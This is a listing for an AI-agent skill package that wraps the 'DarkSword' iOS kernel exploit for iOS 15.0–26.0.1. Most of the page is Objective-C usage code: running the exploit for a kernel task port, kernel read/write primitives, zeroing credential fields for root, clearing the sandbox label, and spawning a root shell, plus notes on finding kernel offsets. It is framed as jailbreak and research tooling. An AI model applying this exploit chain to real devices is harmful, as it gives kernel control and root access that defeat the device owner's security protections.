Skill

DarkSword Kernel Exploit

Provides Objective-C reimplementation of DarkSword kernel exploit for iOS 15.0–26.0.1 with kernel read/write primitives and privilege escalation. For iOS jailbreaks, tooling, research.

iOS

Git

mobile

security

Install

npx claudepluginhub joshuarweaver/cascade-ai-ml-agents-misc-1 --plugin aradotso-trending-skills-37

Tool Access

This skill uses the workspace's default tool permissions.

Preview

```markdown

SKILL.md

Similar Skills

cache-components

Guides Next.js Cache Components and Partial Prerendering (PPR) with cacheComponents enabled. Implements 'use cache', cacheLife(), cacheTag(), revalidateTag(), static/dynamic optimization, and cache debugging.

cache-components

139.2k

mcp-builder

9 files

Guides building MCP servers enabling LLMs to interact with external services via tools. Covers best practices, TypeScript/Node (MCP SDK), Python (FastMCP).

anthropics-skills-13

124.2k

canvas-design

20 files

Generates original PNG/PDF visual art via design philosophy manifestos for posters, graphics, and static designs on user request.

anthropics-skills-13

124.2k

Stats

Stars36

Forks8

Last CommitMar 24, 2026

Actions

View Source View Plugin View on GitHub View README

Theos/Makefile Integration

ARCHS = arm64 arm64e
TARGET = iphone:clang:latest:15.0

include $(THEOS)/makefiles/common.mk

TOOL_NAME = myexploit

myexploit_FILES = main.m DarkSword.m exploit_helpers.m
myexploit_CFLAGS = -fobjc-arc
myexploit_LDFLAGS = -lSystem

include $(THEOS_MAKE_PATH)/tool.mk

Key API / Usage Patterns

1. Running the Exploit

#import "DarkSword.h"

int main(int argc, char *argv[]) {
    @autoreleasepool {
        DarkSword *exploit = [[DarkSword alloc] init];

        BOOL success = [exploit run];
        if (!success) {
            NSLog(@"[!] Exploit failed.");
            return 1;
        }

        NSLog(@"[+] Exploit succeeded. Kernel task port: %d", exploit.kernelTaskPort);
    }
    return 0;
}

2. Kernel Read Primitive

#import "DarkSword.h"

// Read 8 bytes (uint64_t) from a kernel address
uint64_t ReadKernel64(DarkSword *exploit, uint64_t address) {
    uint64_t value = 0;
    [exploit kread:address into:&value size:sizeof(uint64_t)];
    return value;
}

// Example: read kernel slide from a known pointer
uint64_t kernelBase = ReadKernel64(exploit, KNOWN_KERNEL_POINTER_OFFSET);
NSLog(@"[+] Kernel base: 0x%llx", kernelBase);

3. Kernel Write Primitive

#import "DarkSword.h"

// Write 8 bytes to a kernel address
void WriteKernel64(DarkSword *exploit, uint64_t address, uint64_t value) {
    [exploit kwrite:address from:&value size:sizeof(uint64_t)];
}

// Example: patch a kernel flag
uint64_t targetAddr = kernelBase + SOME_OFFSET;
WriteKernel64(exploit, targetAddr, 0x1);
NSLog(@"[+] Kernel flag patched at 0x%llx", targetAddr);

4. Privilege Escalation

#import "DarkSword.h"
#import <unistd.h>

void escalatePrivileges(DarkSword *exploit) {
    // Get current task's proc pointer from kernel
    uint64_t currentProc = [exploit currentProc];

    // Overwrite uid/gid fields to 0 (root)
    uint64_t ucredOffset = [exploit ucredOffsetForProc:currentProc];
    uint64_t ucred = ReadKernel64(exploit, currentProc + ucredOffset);

    // Zero out cr_uid, cr_gid, cr_ruid, cr_rgid
    for (int i = 0; i < 4; i++) {
        WriteKernel64(exploit, ucred + (i * 4), 0x0);
    }

    NSLog(@"[+] UID after escalation: %d", getuid()); // Should print 0
}

5. Providing Custom Kernel Offsets

Since offsets are hardcoded for iOS 15.x, you must supply correct offsets for other versions:

#import "DarkSword.h"

// Create a KernelOffsets struct (check DarkSword.h for definition)
KernelOffsets offsets = {
    .proc_ucred       = 0xD8,   // offsetof(proc, p_ucred) for your iOS version
    .ucred_cr_uid     = 0x18,
    .task_itk_self    = 0xD8,
    .kernelslide      = 0x0,    // determined at runtime
    // ... fill remaining fields per iOS version
};

DarkSword *exploit = [[DarkSword alloc] initWithOffsets:offsets];
BOOL success = [exploit run];

Finding Offsets

Use jtool2 or iometa on the kernelcache for your target iOS version:

# Extract and analyze kernelcache
img4tool -e kernelcache.img4 -o kernelcache.dec
jtool2 --analyze kernelcache.dec

# Find struct offsets
iometa -A kernelcache.dec | grep "proc\|ucred\|task"

Configuration Reference

Field	Description	Default (iOS 15.x)
`proc_ucred`	Offset of `p_ucred` in `proc` struct	Hardcoded
`ucred_cr_uid`	Offset of `cr_uid` in `ucred` struct	Hardcoded
`task_itk_self`	Offset of `itk_self` in `task` struct	Hardcoded
`kernelslide`	KASLR slide (computed at runtime)	`0x0`
`vm_map_offset`	Offset of `vm_map` in `task`	Hardcoded

Common Patterns

Check iOS Version Before Running

#import <UIKit/UIKit.h>
#import "DarkSword.h"

BOOL isSupportedVersion(void) {
    NSOperatingSystemVersion minVer = {15, 0, 0};
    NSOperatingSystemVersion maxVer = {26, 0, 1};
    NSProcessInfo *info = [NSProcessInfo processInfo];
    return [info isOperatingSystemAtLeastVersion:minVer] &&
           ![info isOperatingSystemAtLeastVersion:(NSOperatingSystemVersion){26, 0, 2}];
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        if (!isSupportedVersion()) {
            NSLog(@"[!] Unsupported iOS version.");
            return 1;
        }
        DarkSword *exploit = [[DarkSword alloc] init];
        [exploit run];
    }
    return 0;
}

Unsandboxing the Current Process

void unsandbox(DarkSword *exploit) {
    uint64_t proc = [exploit currentProc];
    uint64_t ucred = ReadKernel64(exploit, proc + [exploit ucredOffsetForProc:proc]);

    // Clear sandbox label pointer (cr_label offset varies by version)
    uint64_t crLabelOffset = 0x78; // iOS 15.x example
    WriteKernel64(exploit, ucred + crLabelOffset, 0x0);

    NSLog(@"[+] Sandbox removed for current process");
}

Spawning a Root Shell

#import <spawn.h>

void spawnRootShell(DarkSword *exploit) {
    escalatePrivileges(exploit);
    unsandbox(exploit);

    pid_t pid;
    char *argv[] = { "/bin/sh", NULL };
    char *envp[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };
    posix_spawn(&pid, "/bin/sh", NULL, NULL, argv, envp);
    waitpid(pid, NULL, 0);
}

Troubleshooting

Exploit Returns NO / Fails Silently

Confirm device is running a supported iOS version (15.0–26.0.1).
Ensure you're running on a physical device — the exploit does not work in the Simulator.
Check kernel offsets match the exact iOS build (minor build differences matter).
Review Xcode console for NSLog output indicating which stage failed.

Kernel Panic on Write

The target address is likely invalid or unmapped. Validate with a kread first.
Ensure KASLR slide is correctly computed before using slid addresses.

Offsets Wrong for My iOS Version

Use jtool2 --analyze or iometa on the specific kernelcache build.
iOS minor/patch versions can change struct layouts — always verify against the exact build number.

Build Errors: Missing Types

Ensure you include both DarkSword.h and exploit_helpers.h in files that use KernelOffsets.
Confirm ARC is enabled (-fobjc-arc).

Codesigning / Entitlements

On-device execution requires a valid provisioning profile.
For full kernel access, the binary may need com.apple.private.security.no-sandbox and task_for_pid-allow entitlements (only grantable via jailbreak or developer bypass).

Project Structure

darksword-kexploit/
├── DarkSword.h          # Main public header (API surface)
├── DarkSword.m          # Core exploit implementation
├── exploit_helpers.h    # Utility types and macros
├── exploit_helpers.m    # Helper functions (kread/kwrite wrappers)
├── offsets.h            # Hardcoded iOS 15.x kernel offsets
└── main.m               # Example entry point

References

opa334/darksword-kexploit on GitHub
jtool2 — kernelcache analysis
iometa — IOKit class enumeration and offset finding
checkra1n / palera1n — reference jailbreak implementations